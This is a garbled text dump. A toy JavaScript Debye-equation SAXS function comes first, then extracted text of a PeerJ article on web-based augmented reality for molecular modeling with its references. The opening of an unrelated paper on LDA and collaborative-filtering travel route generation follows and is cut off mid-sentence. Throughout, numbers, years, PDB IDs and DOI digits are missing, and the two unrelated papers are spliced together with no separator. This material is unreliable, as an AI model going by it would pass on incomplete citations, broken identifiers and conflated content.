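// toy debye-equation profile from a list of scattering centers (one point per residue,
// unit form factors, q values in arbitrary units). illustration only, not the app's code.
function debyeProfile(centers, qValues) {
  return qValues.map(function (q) {
    var I = 0;
    for (var i = 0; i < centers.length; i++) {
      for (var j = 0; j < centers.length; j++) {
        var dx = centers[i].x - centers[j].x;
        var dy = centers[i].y - centers[j].y;
        var dz = centers[i].z - centers[j].z;
        var r = Math.sqrt(dx * dx + dy * dy + dz * dz);
        var qr = q * r;
        I += (qr === 0) ? 1 : Math.sin(qr) / qr;   // f_i = f_j = 1 for simplicity
      }
    }
    return { q: q, I: I };
  });
}

// usage: in the web app the positions would come from the residue beads attached
// to the two ar markers; here they are made-up points along a line.
var profile = debyeProfile(
  [{ x: 0, y: 0, z: 0 }, { x: 3.8, y: 0, z: 0 }, { x: 7.6, y: 0, z: 0 }],
  [0.01, 0.05, 0.1, 0.2, 0.3]
);
```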
this offers a way to interactively test compatibility of possible docking poses with the experimental data. although it cannot compete with the extensive sampling achievable with molecular simulations, such an interactive tool could be useful for preliminary analysis of saxs data before starting complex calculations or to assist interpretation of the results of such calculations. for simplicity and speed, in this example the saxs profile calculation is based on the debye formula iterated through pairs of residues instead of through all pairs of atoms as the full equation requires (debye, ); however, realistic saxs profiles of actual utility in modeling can be achieved with coarse graining strategies and proper parameterization of the scattering centers (stovgaard et al., ). this web app further includes a rudimentary residue-grained force field (i.e., describing each amino acid with one backbone and one side chain bead) to detect clashes, and a predefined binding coordinate which upon activation brings the two molecules together. activation of saxs profile simulation, clash-detecting force field and binding coordinate are controlled abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://developers.google.com/chart http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by voice commands, required because the user’s hands are busy handing the markers. this proceeds through the browser’s cloud-based speech recognition api so does not consume much resources. the successful combination of all these different elements (ar, d visualization, calculations, and speech recognition) illustrates the superb integration capability of libraries for client-side scripting in web browsers. the modularity and simplicity of client-side web programming allows easy adaptation to other kinds of experimental data; for example to residue-specific paramagnetic relaxation enhancements as done by prof. rasia (ibr-conicet-unr, argentina) at https://rrasia.altervista.org/ hyl _ - /hyl _ _minima.html. another example, presented in fig. b shows how ar can help to explore residue- residue contact predictions from residue coevolution data. such predictions provide useful restraints in modern approaches for modeling proteins and their complexes (simkovic et al., ; abriata et al., ; abriata, tamò & dal peraro, ), but often include a fraction of false positives that introduce incorrect information if undetected. interactive inspection of residue-residue contact predictions could help to actively detect false positives through human intervention before the actual restraint-guided modeling proceeds. the example in fig. b shows contacts predicted from coevolution analysis of large sequence alignments for the pair of proteins in chains a and b of pdb id qop, taken from the gremlin server (ovchinnikov, kamisetty & baker, ). each protein is driven by one marker, and the predicted contacts are overlaid as dotted lines connecting the intervening pairs of residues. these lines are colored green, olive and red according to decreasing coevolution score as in the gremlin website, and their widths reflect in real figure interactivity in biological macromolecules. (a) ubiquitin and ubiquitin-interacting motif (red and blue respectively, taken from pdb id d g) driven in d with two ar markers, as the web app computes the predicted saxs profile and displays it overlaid on top of a purported experimental profile together with a metric of the fit quality. 
(b) interactive exploration of contacts predicted between two proteins (here from coevolution data) before and after manual docking. this example is qop from ovchinnikov et al., where contacts predicted with high score are colored green, contacts of intermediate confidence are olive, and the first contact of low probability is shown red (as taken from the original data). the thickness of the contact lines indicates distance, such that thin lines indicate the residues are close in space. notice how the red contact, which has low probability, remains thicker than the well-scored contacts (green) upon manual docking. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://rrasia.altervista.org/hyl _ - /hyl _ _minima.html https://rrasia.altervista.org/hyl _ - /hyl _ _minima.html http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time the distance between pairs of residues, presumably minimal when contacts are satisfied if the prediction is true. the last prototype application shows rudimentary handling of highly disordered protein regions, in this case to test how a flexible linker made of six glycine residues restricts the space available for exploration and possible docking poses of two well-folded domains (figs. a– c). each folded domain (ubiquitin and ubiquitin-interacting motif, taken from pdb id d g) is modeled at a resolution of two spheres per residue, one centered at the backbone’s alpha carbon and one at the center of mass of the sidechain (i.e., a description slightly coarser than that of the martini force field (marrink et al., )). all spheres representing residues of the folded domains are kept in fixed positions relative to their ar marker, and have radii assigned as the cubic root of the amino acid volumes to roughly respect the relative amino acid sizes (abriata, palzkill & dal peraro, ). the glycine residues of the flexible linker are modeled as single spheres centered at the alpha carbons with their radii set to the cubic root of glycine’s volume. using cannon.js, the spheres representing the glycine residues of the flexible linker (in orange in fig. ) are allowed to move freely but under a fixed-distance constraint from each other and from the corresponding ends of the folded domains. this very simple model can help to answer questions related to the separation of the anchor points and the maximal extension of the linker when straight: how far apart can the two proteins go with the given linker containing six residues? can both proteins be docked through certain interfaces keeping the linker in a relaxed configuration? the user’s investigations are assisted by on-the-fly estimation of entropy associated to given extensions of the linkers, estimated with a worm-like chain model from polymer physics (marko & siggia, ), and by an estimation of the strain experienced by the linker when the user pulls its glycine residues apart beyond their equilibrium distance. discussion achieving seamless integration of immersive visualizations, haptic interfaces and chemical computation stands as one of the key “grand challenges” for the simulation of matter in the st century (aspuru-guzik, lindh & reiher, ). such integration is expected to help us to more easily grasp and explore molecular properties and to efficiently navigate chemical information. in the last two decades several works introduced different ways to achieve ar and vr, as presented in the introduction section. 
in education, such tools could replace or complement physical (such as plastic-made) modeling kits, augmenting them with additional information about forces, charges, electron distributions, data facts, etc. in research, such tools could help better visualize and probe molecular structure, simulate expected outcomes of experiments and test models and simulated data against experimental data, etc., all through intuitive cues and fluent human-computer interactions. this article introduced a minimal set of building blocks and code for developing marker-based ar applications for molecular modeling in web browsers using regular computers. since web ar is a new and emerging technology, it is reasonable to identify some limitations. naturally, such web apps cannot currently match the graphics quality and interfacing capabilities of programs prepared for specialized ar/vr hardware, and the abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure dynamics of highly disordered protein linkers modeled with rigid-body mechanics. ubiquitin and ubiquitin-interacting motif (pdb id d g) modeled as two to four beads per residue, colored by physi- cochemical properties (gray = hydrophobic, red = negative, blue = positive, green = polar uncharged; backbone beads in black). the domains are driven independently in d with two ar markers. they are connected through a flexible linker of six backbone-sized beads (orange) whose dynamics are treated with the cannon.js rigid-body force field. the web app reports in real time the distance between the centers of both domains, the entropy of the linker based on a worm-like chain model, and the linker strain computed from deviations of distances between consecutive linker beads from an equilibrium distance. (a) the two domains extended as much as possible while keeping the linker relaxed (although entropically unfavored) illustrates the maximum possible separation with the given linker is of around Å. (b) the binding pose between the two domains is geometrically feasible as it keeps the linker relaxed. (c) this other binding pose is unachievable with a linker of this length. full-size doi: . /peerj-cs. /fig- abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use of a webcam to follow markers can result in unstable tracking under certain conditions compared to setups that use ad hoc devices. another limitation is that support for ar in smartphones is not uniform, and varies greatly between devices. currently, only laptops and desktop computers provide a consistent experience. lastly, content developers must routinely verify that the web apps continue to work in major browsers after updates, and also validate them against new w c standards, apis and libraries. on the bright side, these web apps have some important advantages. first, all examples presented here rely only on client-side programming; therefore, applications need only be uploaded to regular webservers to become available to the world. second, they do not require client-side plugins, so are supported “out of the box” by standard web browsers. third, the modularity of javascript and the availability of several ready-to-use libraries greatly simplify development of new content. fourth, users of these applications do not need to worry about updates, as they always receive the latest version when they reload the page. 
all in all, these positive features will favor adoption of browser based ar/vr for educational purposes over alternatives that require specialized software and hardware. future perspectives for educational applications, the next stage would be to develop actual content of value for teachers and students. the simplest content could merely provide visualizations to explore molecular geometries, surfaces, orbitals, etc., with specific sets of demos to assist learning of key concepts such as chirality, organic molecules, metal coordination complexes and biomacromolecular structures, to mention just a few cases. by adding mechanics, more complex demos could be created where students could for example interactively explore torsion angles as in the textbook cases of probing the energy landscape of rotation around the central c–c bond of butane, or swapping between chair and boat conformations of six-member rings, exploring hydrogen bonding patterns between neighbor beta strands in a protein, etc. importantly, every single student having a computer at hand could use these apps, not only at the school/university but also at home, therefore this could become an actual learning tool of full-time, individual use. the possibility of reaching the masses with this kind of web technologies for ar-based molecular modeling in turn opens up the opportunity of performing large-scale evaluations of their actual impact in education. as actively investigated by others, there is also a need to explore if full working programs for ar-based molecular modeling may actually become powerful enough to also assist research. here again, web-based tools like those discussed in this article could help to carry out such tests at large scales. some of the prototypes presented here advance possible uses in research, as in the simulation of data from protein–protein docking poses and comparison to the corresponding experimental data in real time. however, some issues should be addressed before creating fully-fledged web programs for research: (i) improving ar marker detection and tracking to stabilize inputs (gao et al., ), (ii) developing some kind of ar marker that is clickable so that users can drag and drop objects in space (hitherto unexplored), (iii) improving graphics, where the possibility of adapting existing web molecular graphics like ngl (rose & hildebrand, ), dmol abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (rego & koes, ), litemol (sehnal et al., in press), mol� (sehnal et al., ), jsmol (hanson et al., ), etc. is particularly enticing, and (iv) developing force fields that correctly handle molecular dynamics and energetics for different tasks, which may imply different levels of granularity for different applications. another global improvement, also important for pedagogical applications, would be incorporating proper object occlusion, which is still non-trivial and subject of studies in the ar community (shah, arshad & sulaiman, ; gimeno et al., ). some further directions that could be explored in the near future are fluently connecting through an ar experience users in physically distant locations, so that they can collaborate on a research project or teach/learn at a distance. adapting future standards for commodity ar/vr in smartphones (plugged into cardboard goggles for stereoscopy) is also worth exploring as this would lead to an even more immersive experience than with the mirror-like apps proposed here. 
however, since smartphones are more limited in power, their use for ar molecular modeling may require coupling to external computer power. last, pushing the limits towards fully immersive visual analytics for molecular modeling, and especially thinking about solutions useful for research, a few especially enticing additions include support for haptic devices for force feedback, ar without markers (i.e., just by tracking the users’ hands and fingers) and considering occlusion, and as described above, the capability to respond to visual or audio cues by automatically checking databases and mining literature to propose relevant pieces of information. acknowledgements i acknowledge all the members of the communities that develop the client-side web programming tools used here, as well as the very helpful communities who contribute to their improvement, bug detection and correction, documentation, and online help. special thanks to j. ethienne (ar.js developer), nicolò carpignoli (ar.js maintainer), d. mccurdy (google), t. ater (annyang developer), l. stemkoski (adelphi u., usa), a. herráez (u. alcalá, spain) and a. papoutsaki (pomona college, usa) for assistance. i also acknowledge numerous researchers from the physics, chemistry and biology communities who have provided ideas, suggestions, examples and support, especially l. krapp, s. träger, m. dal peraro, f.g. van der goot and m.e. zaballa (epfl, switzerland), a. barducci (cbs, france), d. moreno and g. frattini (iquir-conicet-unr, argentina), and r. rasia (ibr-conicet-unr, argentina). finally, i greatly acknowledge the extremely helpful revisions from the editor and two reviewers. additional information and declarations funding the author received no funding for this work. competing interests the author declares that he has no competing interests. abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � luciano a. abriata conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: all code is available as a github repo at https://github.com/labriata/prototype-web- apps-for-ar-molecular-modeling/ and also in the links in the article. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abriata la. a. web apps come of age for molecular sciences. informatics ( ): doi . /informatics . abriata la. b. concurrent interactive visualization and handling of molecular structures over the internet in web browsers. arxiv e-prints arxiv: . . abriata la, palzkill t, dal peraro m. . how structural and physicochemical determinants shape sequence constraints in a functional enzyme. plos one ( ):e doi . /journal.pone. . abriata la, rodrigues jpglm, salathé m, patiny l. . augmenting research, education and outreach with client-side web programming. trends in biotechnology ( ): – doi . /j.tibtech. . . . abriata la, tamò ge, dal peraro m. . a further leap of improvement in tertiary structure prediction in casp prompts new routes for future assessments. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . abriata la, tamo g, monastyrskyy m, kryshtafovych a, dal peraro m. . 
assessment of hard target modeling in casp reveals an emerging role of alignment-based contact prediction methods. proteins: structure, function, and bioinformatics (suppl ): – . aspuru-guzik a, lindh r, reiher m. . the matter simulation (r)evolution. acs central science ( ): – doi . /acscentsci. b . ater t. . annyang. available at https://github.com/talater/annyang. bach b, sicat r, beyer j, cordeil m, pfister h. . the hologram in my hand: how effective is interactive exploration of d visualizations in immersive tangible augmented reality? ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . balo ar, wang m, ernst op. . accessible virtual reality of biomolecular structural models using the autodesk molecule viewer. nature methods ( ): – doi . /nmeth. . bartók ap, de s, poelking c, bernstein n, kermode jr, csányi g, ceriotti m. . machine learning unifies the modeling of materials and molecules. science advances ( ):e doi . /sciadv. . berry c, board j. . a protein in the palm of your hand through augmented reality. biochemistry and molecular biology education ( ): – doi . /bmb. . abriata ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/labriata/prototype-web-apps-for-ar-molecular-modeling/ https://github.com/labriata/prototype-web-apps-for-ar-molecular-modeling/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /informatics http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.tibtech. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /acscentsci. b https://github.com/talater/annyang http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /sciadv. http://dx.doi.org/ . /bmb. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bertini i, turano p, vila aj. . nuclear magnetic resonance of paramagnetic metalloproteins. chemical reviews ( ): – doi . /cr a . bolopion a, cagneau b, redon s, régnier s. . haptic feedback for molecular simulation. in: ieee/rsj international conference on intelligent robots and systems, october – , , st. louis. – . bolopion a, cagneau b, redon s, régnier s. . comparing position and force control for interactive molecular simulators with haptic feedback. journal of molecular graphics and modelling ( ): – doi . /j.jmgm. . . . debye p. . zerstreuung von röntgenstrahlen. annalen der physik ( ): – doi . /andp. . dipierro m. . the rise of javascript. computing in science & engineering ( ): – doi . /mcse. . . doutreligne s, cragnolini t, pasquali s, derreumaux p, baaden m. . unitymol: interactive scientific visualization for integrative biology. in: ieee th symposium on large data analysis and visualization (ldav), paris. – . fjeld m, voegtli bm. . augmented chemistry: an interactive educational workbench. in: proceedings of the international symposium on mixed and augmented reality, darmstadt. – . gaffary y, le gouis b, marchal m, argelaguet f, arnaldi b, lécuyer a. . ar feels “softer” than vr: haptic perception of stiffness in augmented versus virtual reality. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . gao qh, wan tr, tang w, chen l. . a stable and accurate marker-less augmented reality registration method. in: international conference on cyberworlds (cw), chester. – . gillet a, sanner m, stoffler d, goodsell d, olson a. . augmented reality with tangible auto-fabricated models for molecular biology applications. in: ieee visualization , austin, tx, usa. ieee. 
gillet a, sanner m, stoffler d, olson a. . tangible interfaces for structural molecular biology. structure ( ): – doi . /j.str. . . . gimeno j, casas s, portalés c, fernádez m. . addressing the occlusion problem in augmented reality environments with phantom hollow objects. in: ieee international symposium on mixed and augmented reality adjunct (ismar-adjunct), munich. – . goddard td, brilliant aa, skillman tl, vergenz s, tyrwhitt-drake j, meng ec, ferrin te. a. molecular visualization on the holodeck. journal of molecular biology ( ): – doi . /j.jmb. . . . goddard td, huang cc, meng ec, pettersen ef, couch gs, morris jh, ferrin te. b. ucsf chimerax: meeting modern challenges in visualization and analysis. protein science ( ): – doi . /pro. . hanson rm, prilusky j, renjian z, nakane t, sussman jl. . jsmol and the next-generation web-based representation of d molecular structure as applied to proteopedia. israel journal of chemistry ( – ): – doi . /ijch. . hendler j. . communication: enhanced: science and the semantic web. science ( ): – doi . /science. . hirano s, kawasaki m, ura h, kato r, raiborg c, stenmark h, wakatsuki s. . double-sided ubiquitin binding of hrs-uim in endosomal protein sorting. nature structural & molecular biology ( ): – doi . /nsmb . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /cr a http://dx.doi.org/ . /j.jmgm. . . http://dx.doi.org/ . /andp. http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /j.str. . . http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /pro. http://dx.doi.org/ . /ijch. http://dx.doi.org/ . /science. http://dx.doi.org/ . /nsmb http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hirst jd, glowacki dr, baaden m. . molecular simulations and visualization: introduction and overview. faraday discussions : – doi . /c fd c. humphrey w, dalke a, schulten k. . vmd: visual molecular dynamics. journal of molecular graphics ( ): – doi . / - ( ) - . jiang c, jin x. . quick way to port existing c/c++ chemoinformatics toolkits to the web using emscripten. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . kato h. . artoolkit. available at http://www.hitl.washington.edu/artoolkit/. krichenbauer m, yamamoto g, taketom t, sandor c, kato h. . augmented reality versus virtual reality for d object manipulation. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . lee j, kim j-i, kang l-w. . a collaborative molecular modeling environment using a virtual tunneling service. journal of biomedicine and biotechnology ( ): – doi . / / . maier p, klinker g. . augmented chemical reactions: d interaction methods for chemistry. international journal of online engineering (ijoe) (s ): doi . /ijoe.v is . . maier p, tönnis m, gudrunklinker d. . dynamics in tangible chemical reactions. world academy of science, engineering and technology : – . marko jf, siggia ed. . statistical mechanics of supercoiled dna. physical review e ( ): – doi . /physreve. . . marrink sj, risselada hj, yefimov s, tieleman dp, de vries ah. . the martini force field: coarse grained model for biomolecular simulations. journal of physical chemistry b ( ): – doi . /jp f. martínez-hung h, garcía-lópez ca, escalona-arranz jc. . augmented reality models applied to the chemistry education on the university (article in spanish). revista cubana de química : – . matthews d. . virtual-reality applications give science a new dimension. nature ( ): – doi . /d - - - . 
matthews n, kitao a, laycock s, hayward s. . haptic-assisted interactive molecular docking incorporating receptor flexibility. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . moore eb, chamberlain jm, parson r, perkins kk. . phet interactive simulations: transformative tools for teaching chemistry. journal of chemical education ( ): – doi . /ed . müller c, krone m, huber m, biener v, herr d, koch s, reina g, weiskopf d, ertl t. . interactive molecular graphics for augmented reality using hololens. journal of integrative bioinformatics ( ): doi . /jib- - . o’connor m, deeks hm, dawn e, metatla o, roudaut a, sutton m, thomas lm, glowacki br, sage r, tew p, wonnacott m, bates p, mulholland aj, glowacki dr. . sampling molecular conformations and dynamics in a multiuser virtual reality framework. science advances ( ):eaat doi . /sciadv.aat . o’donoghue si, gavin a-c, gehlenborg n, goodsell ds, hériché j-k, nielsen cb, north c, olson aj, procter jb, shattuck dw, walter t, wong b. . visualizing biological data— now and in the future. nature methods (s ):s –s doi . /nmeth.f. . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /c fd c http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /acs.jcim. b http://www.hitl.washington.edu/artoolkit/ http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . / / http://dx.doi.org/ . /ijoe.v is . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /jp f http://dx.doi.org/ . /d - - - http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /ed http://dx.doi.org/ . /jib- - http://dx.doi.org/ . /sciadv.aat http://dx.doi.org/ . /nmeth.f. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ovchinnikov s, kamisetty h, baker d. . robust and accurate prediction of residue–residue interactions across protein interfaces using evolutionary information. elife :e doi . /elife. . pafilis e, o’donoghue si, jensen lj, horn h, kuhn m, brown np, schneider r. . reflect: augmented browsing for the life scientist. nature biotechnology ( ): – doi . /nbt - . papoutsaki a, sangkloy p, laskey j, daskalova n, huang j, hays j. . webgazer: scalable webcam eye tracking using user interactions. in: proceedings of the th international joint conference on artificial intelligence, new york. – . paruzzo fm, hofstetter a, musil f, de s, ceriotti m, emsley l. . chemical shifts in molecular solids by machine learning. arxiv preprint arxiv: . doi . /s - - -x. pence he, williams aj, belford re. . new tools and challenges for chemical education: mobile learning, augmented reality, and distributed cognition in the dawn of the social and semantic web. in: garcía‐martínez j, serrano‐torregrosa e, eds. chemistry education. weinheim: wiley-vch verlag gmbh & co. kgaa, – . pimentel v, nickerson bg. . communicating and displaying real-time data with websocket. ieee internet computing ( ): – doi . /mic. . . ratamero em, bellini d, dowson cg, römer ra. . touching proteins with virtual bare hands: visualizing protein-drug complexes and their dynamics in self-made virtual reality using gaming hardware. journal of computer-aided molecular design ( ): – doi . /s - - - . rebholz-schuhmann d, oellrich a, hoehndorf r. . text-mining solutions for biomedical research: enabling integrative biology. nature reviews genetics ( ): – doi . /nrg . rego n, koes d. . dmol.js: molecular visualization with webgl. bioinformatics ( ): – doi . /bioinformatics/btu . rose as, hildebrand pw. . ngl viewer: a web application for molecular visualization. 
nucleic acids research (w ):w –w doi . /nar/gkv . russel d, lasker k, webb b, velázquez-muriel j, tjioe e, schneidman-duhovny d, peterson b, sali a. . putting the pieces together: integrative modeling platform software for structure determination of macromolecular assemblies. plos biology ( ):e doi . /journal.pbio. . sehnal d, deshpande m, svobodová vařeková r, mir s, berka k, midlik a, pravda l, velankar s, koča j. litemol suite: interactive web-based visualization of large-scale macromolecular structure data. nature methods (in press). sehnal d, rose as, koča j, burley sk, velankar s. . mol�: towards a common library and tools for web molecular graphics. in: proceedings of the workshop on molecular graphics and visual analysis of molecular data, molva ’ , goslar, eurographics association. – . sekhavat ya, zarei h. . enhancing the sense of immersion and quality of experience in mobile games using augmented reality. journal of computing and security : – . shah mm, arshad h, sulaiman r. . occlusion in augmented reality. in: th international conference on information science and digital content technology (icidt ), jeju. – . simkovic f, ovchinnikov s, baker d, rigden dj. . applications of contact predictions to structural biology. iucrj ( ): – doi . /s . abriata ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /elife. http://dx.doi.org/ . /nbt - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nrg http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ smith js, isayev o, roitberg ae. . ani- : an extensible neural network potential with dft accuracy at force field computational cost. chemical science ( ): – doi . /c sc a. sommer b, baaden m, krone m, woods a. . from virtual reality to immersive analytics in bioinformatics. journal of integrative bioinformatics ( ): doi . /jib- - . stocks mb, hayward s, laycock sd. . interacting with the biomolecular solvent accessible surface via a haptic feedback device. bmc structural biology ( ): doi . / - - - . stocks mb, laycock sd, hayward s. . applying forces to elastic network models of large biomolecules using a haptic feedback device. journal of computer-aided molecular design ( ): – doi . /s - - - . stone j. . vmd support for vr and interactive md. available at https://www.ks.uiuc.edu/ research/vmd/allversions/interactive_md.html. stovgaard k, andreetta c, ferkinghoff-borg j, hamelryck t. . calculation of accurate small angle x-ray scattering curves from coarse-grained protein models. bmc bioinformatics ( ): doi . / - - - . vega garzón jc, magrini ml, galembeck e. . using augmented reality to teach and learn biochemistry. biochemistry and molecular biology education ( ): – doi . /bmb. . wiebrands m, malajczuk cj, woods aj, rohl al, mancera rl. . molecular dynamics visualization (mdv): stereoscopic d display of biomolecular structure and interactions using the unity game engine. journal of integrative bioinformatics ( ): doi . /jib- - . wollacott am, merz km. . haptic applications for molecular structure manipulation. journal of molecular graphics and modelling ( ): – doi . /j.jmgm. . . . wolle p, müller mp, rauh d. . augmented reality in scientific publications—taking the visualization of d structures to the next level. acs chemical biology ( ): – doi . /acschembio. b . xu k, liu n, xu j, guo c, zhao l, wang h-w, zhang qc. . 
vrmol: an integrative cloud-based virtual reality system to explore macromolecular structure. biorxiv doi . / . yang s, mei b, yue x. . mobile augmented reality assisted chemical education: insights from elements d. journal of chemical education ( ): – doi . /acs.jchemed. b .
international journal of advanced network, monitoring and controls volume , no. ,

traveling route generation algorithm based on lda and collaborative filtering

peng cui, yuming wang and chunmei li*
department of computer technology and applications, qinghai university, xining, china
e-mail: li_chm @sina.com

abstract—with the rapid development of china's economy and the growth of tourism consumption, the number of domestic travelers has increased rapidly every year, and more travelers now choose privately customized travel routes, so generating reasonable travel routes from users' actual needs has become a hot research topic in both industry and academia. in practice, however, planning a travel route is a comprehensive and complex task: a reasonable route must jointly account for suitable travel cities, travel time, transportation, and the itinerary. at present, the traditional approach is for a customer manager to collect the user's requirements, plan a suitable route manually, and then revise and adjust it through further communication with the customer. the problem this brings is that, when planning numerous routes, the customer manager must compare information such as users' needs, travel price, travel time, transportation, and the arrangement of scenic spots. the traditional approach therefore has significant disadvantages, such as low efficiency and long turnaround times; it places a great burden on the staff and is incompatible with the development of the industry. to solve these problems, this paper takes collected historical travel routes as the data set and designs a travel route recommendation and generation algorithm based on lda and collaborative filtering. a reasonable city recommendation list and visiting times are the basis and focus of route planning, so, starting from the many shortcomings of the traditional route planning method, this work concentrates on city recommendation and time planning. different recommendation algorithms were designed, including recommendation algorithms based on latent dirichlet allocation (lda) and on collaborative filtering. by analyzing their performance on the data set, these algorithms were improved and optimized into an lda algorithm based on kde (kernel density estimation) and classification and a collaborative filtering algorithm based on kde and classification.
the final experimental results show that the city list and travel times generated by the recommended algorithm are reasonable and satisfy the actual needs of users. keywords-lda model; collaborative filtering; kde algorithm; recommendation algorithm; machine learning i. introduction with the rapid development of china's national economy in recent years, the tourism industry has become an important part of the national economy, and the number of travelers has been increasing steadily. according to data from the national bureau of statistics, consumption brought by tourism has increased year by year, and the industry has shown an accelerated convergence of online and offline channels. traditional travel agencies have been unable to meet consumers' needs and the development of modern tourism. against this background, the online development of tourism has become a research hotspot in academia and industry. at present, the main carriers of online tourism are online travel websites (such as tuniu.com, tongcheng.com, etc.). traditional travel websites are designed in the b/s mode [ ] and can provide consumers with a large amount of tourist information; however, the travel routes displayed on these websites are planned manually by sales account managers after collecting users' requirements. this creates two problems. on the one hand, manual planning of travel routes has low productivity and cannot keep up with the development of tourism, so automatically generating a reasonable travel route with intelligent algorithms according to users' needs has become an urgent problem. on the other hand, traditional travel routes can no longer meet the individual needs of each user, so reducing the blindness and randomness of route arrangement and providing customers with personalized routes, and thus more travel options, has gradually become a research hotspot for the relevant enterprises and disciplines. in recent years, algorithms for travel route generation, lda, and collaborative filtering have been reported many times. ma zhangbao et al. [ ] started from the spatial decision-making of tourism travel, studied methods and techniques for tourism travel decision support systems, and proposed an operational model of travel combining space and time together with an lbs model of tourism travel routes. however, their model focuses on querying attractions and hotels based on space, time and location services, and then providing users with a query service for the optimal destination and the scheme to reach it; it cannot generate a complete travel route according to the user's demand and is therefore not suitable for application in practice. jin baohui et al. [ ] designed a travel route choice model based on regret theory, pointed out the deficiencies of expected utility theory and prospect theory via comparison, and proposed a simpler route choice model. their work focuses on describing tourists' behavior when selecting routes and presents a selection model for tourists under uncertain conditions; it does not comprehensively compare and rank travel routes, nor does it discuss practical problems. moreover, the travel information provided by online travel sites, which offers a large data source, was ignored in their work.
chunjing xiao et al. proposed a travel route recommendation method based on dynamic clustering. the method first analyzes the different characteristics of tourism data and other standard data; it then uses variable-length time windows obtained by dynamic clustering to divide the tourists' interaction history. latent dirichlet allocation (lda) is used to extract the probabilistic topic distribution of each stage, and a user interest drift model is established by combining time penalty weights. finally, route recommendation is completed according to the relevance between candidate topics and the tourists' probabilistic topics [ ]. although this method has good recommendation accuracy, it focuses on recommending possible routes for users under the premise that user interest sets and numerous travel routes already exist; it does not study travel route generation. wang hui et al. proposed applying the ant colony algorithm to travel route planning: they discussed the vehicle routing problem based on the ant colony algorithm and computed a tour of scenic spots in the country using the shortest time. however, their paper does not study the planning and generation of travel routes that meet the user's preference conditions [ ]. hou le et al. [ ] proposed an optimization algorithm based on iterated local search (ils) and cuckoo search (cs). the algorithm first uses ils to select tourist attractions and initial travel routes; the cs algorithm is then used to minimize the time cost of the travel route while satisfying both the time window constraints of the attractions and the total number of attractions. the main problem solved by the algorithm is finding the complete route with the shortest travel time given the tourist attractions. the research focuses on minimizing route time and does not cover the full pipeline from city list generation to route planning. research on and applications of recommendation algorithms such as collaborative filtering and lda (latent dirichlet allocation) have been reported at home and abroad. yajun li et al. [ ] wrote a review of collaborative filtering recommendation techniques, summarizing and comparing collaborative filtering algorithms. the review first expounds the connotation of collaborative filtering and its main issues, including sparsity, multi-content and scalability, and then details the solutions proposed by domestic and foreign scholars; it is very helpful for the study of collaborative filtering algorithms. qiang c et al. proposed a recommendation algorithm based on tags and collaborative filtering. tags are used as information embodying user interest preferences and resource characteristics; user and resource tag feature vectors are generated from the multi-dimensional relationships between users, tags and resources; finally, sorting the predicted preference values produces top-n recommendations, and the collaborative filtering algorithm is applied to the recommendation of personalized resources [ ]. one of the most successful applications of collaborative filtering algorithms abroad is the amazon online store.
amazon's g linden et al. [ ] proposed an item-based collaborative filtering algorithm, which is well suited to comparing similar items rather than similar users; because the number of items is much larger than the actual number of users, this yields high-quality recommendations. regarding the lda algorithm, d m blei et al. [ ] proposed a three-level hierarchical bayesian model, together with an efficient approximate inference technique based on variational methods and an em algorithm for empirical bayesian parameter estimation. the lda algorithm has been successfully applied to text modeling, text categorization, topic extraction and related fields, and has been compared with unigram mixtures and probabilistic lsi models. r krestel et al. [ ] successfully applied the lda algorithm to tag recommendation: they used lda to mine user tags under the same theme and then recommended new tags to the user as search conditions, which improved search efficiency. judging from the current research status at home and abroad, no scholars or enterprises yet provide a feasible and accurate method that meets actual requirements. current research focuses on recommending travel routes under the premise that user information and historical route data are available, that is, recommending routes from the historical routes based on the user's historical information; for a new user's demand, such methods cannot generate a new route that meets the user's needs. at the same time, our study of collaborative filtering and the lda algorithm shows 